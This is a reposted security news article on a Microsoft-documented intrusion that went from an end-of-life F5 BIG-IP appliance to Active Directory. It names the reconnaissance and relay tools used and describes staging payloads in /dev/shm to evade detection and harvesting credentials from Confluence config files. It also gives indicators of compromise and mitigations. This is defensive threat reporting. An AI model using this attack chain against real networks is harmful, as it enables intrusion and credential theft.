By rssfeeds-admin 
A sophisticated, multi-stage intrusion campaign has been documented by Microsoft’s Defender Security Research team, in which a threat actor exploited an internet-facing F5 BIG-IP edge appliance as the entry point for a widespread, identity-focused attack that ultimately reached Active Directory.
The incident highlights a dangerous and accelerating pattern: firewalls, VPN gateways, and load balancer devices traditionally deployed as security boundaries are increasingly being repurposed as initial access vectors.
The threat actor established SSH access to an internal Linux host originating from an Azure-hosted F5 BIG-IP Virtual Edition (VE) running version 15.1.201000, a build commonly provisioned via Azure ARM templates and Terraform modules.
Exploit F5 BIG-IP SSH Access
This version reached end-of-life (EOL) on December 31, 2024, leaving it unpatched and unsupported at the time of exploitation.
Because edge appliances are externally exposed, lightly monitored, and deeply trusted within enterprise environments, the compromise gave the attacker a durable, low-visibility foothold, complete with stored credentials, certificates, and identity integrations, all before a single endpoint detection was triggered.
Once authenticated via SSH using a privileged account with sudo rights, according to Microsoft, the threat actor maintained hands-on keyboard access throughout the operation without deploying explicit persistence mechanisms.
The attacker immediately conducted aggressive internal reconnaissance:
- Nmap with automated shell scripts for horizontal subnet scanning and vertical service enumeration
- GoWitness to fingerprint and screenshot HTTP/HTTPS services via a SOCKS5 proxy
- A custom ELF binary flagged by Microsoft as HackTool:Linux/MalPack.B downloaded from C2 server
206.189.27[.]39to enumerate web application access controls, including Firebase and GCM endpoints - NTLM lateral movement tools, including enum4linux, netexec, kerbrute, responder, smbclient, and timeroast, against discovered Windows servers, though these initial attempts failed
Reconnaissance surfaced an internal Atlassian Confluence server carrying unpatched remote code execution vulnerabilities. Although Confluence was not internet-facing, it became reachable once the attacker gained a foothold in the internal network.
When real-time protection (RTP) repeatedly blocked direct payload delivery to the Confluence host, the attacker adapted by standing up a Python ftplib-based anonymous FTP server on the initial Linux host, and transferring the payload via curl into /dev/shm, a volatile in-memory path designed to evade disk-based detection.
After compromising Confluence, the attacker harvested credentials from server.xml and confluence.cfg.xml configuration files and immediately weaponized them against the Windows domain infrastructure, escalating into Kerberos relay attacks and exploitation of CVE-2025-33073 using netexec with PetitPotam coercion and DNS manipulation tooling aimed at the domain controller.
Indicators of Compromise (IOC)
| Indicator | Type | Description |
|---|---|---|
4a927d031919fd6bd88d3c8a917214b54bca00f8ddc80ecfe4d230663dda7465 | SHA-256 File Hash | Custom scanning tool |
b4592cea69699b2c0737d4e19cff7dca17b5baf5a238cd6da950a37e9986f216 | SHA-256 File Hash | Shell script automating Nmap network scanning |
710a9d2653c8bd3689e451778dab9daec0de4c4c75f900788ccf23ef254b122a | SHA-256 File Hash | Kerbrute tool |
57b3188e24782c27fdf72493ce599537efd3187d03b80f8afe733c72d68c5517 | SHA-256 File Hash | gowitness HTTP/HTTPS screenshot scanner |
bdd5da81ac34d9faa2a5118d4ed8f492239734be02146cd24a0e34270a48a455 | SHA-256 File Hash | NTLM relay Python script |
206.189.27[.]39 | IPv4 Address (Defanged) | C2 server |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Mitigation
Microsoft recommends the following defensive actions for organizations running F5 BIG-IP or hybrid infrastructure:
- Retire all EOL F5 BIG-IP appliances and enforce strict lifecycle and patch governance for all internet-facing edge devices; treat them as Tier-0 assets
- Patch internal web applications (Confluence, Jira) with the same urgency as external services, as they become reachable attack surfaces once any internal foothold is established.
- Disable NTLM where possible, enforce SMB signing, enable LDAP signing and channel binding, and apply Extended Protection for Authentication (EPA) to neutralize relay attacks.
- Enable Microsoft Defender for Endpoint in block mode across all Linux servers. RTP successfully blocked the ELF payload on the one host where it was active
As Microsoft notes, this intrusion demonstrates that attackers do not require advanced sophistication only persistence and exploitable patching and monitoring gaps across a hybrid estate.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.
The post Hackers Exploit F5 BIG-IP SSH Access to Compromise Active Directory appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.